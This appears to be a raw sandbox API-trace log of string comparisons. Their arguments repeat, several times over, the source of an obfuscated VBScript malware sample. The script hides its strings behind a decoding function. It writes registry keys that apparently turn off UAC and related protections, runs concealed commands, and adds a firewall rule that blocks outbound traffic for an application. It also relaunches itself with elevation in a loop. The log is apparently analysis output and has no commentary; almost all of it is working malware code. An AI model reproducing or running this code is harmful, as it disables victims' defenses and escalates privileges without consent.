bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.342] wcsncmp (_String1="\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -26 [0226.342] wcsncmp (_String1="\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.342] wcsncmp (_String1="\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0226.342] wcsncmp (_String1="\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.342] wcsncmp (_String1="for each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, 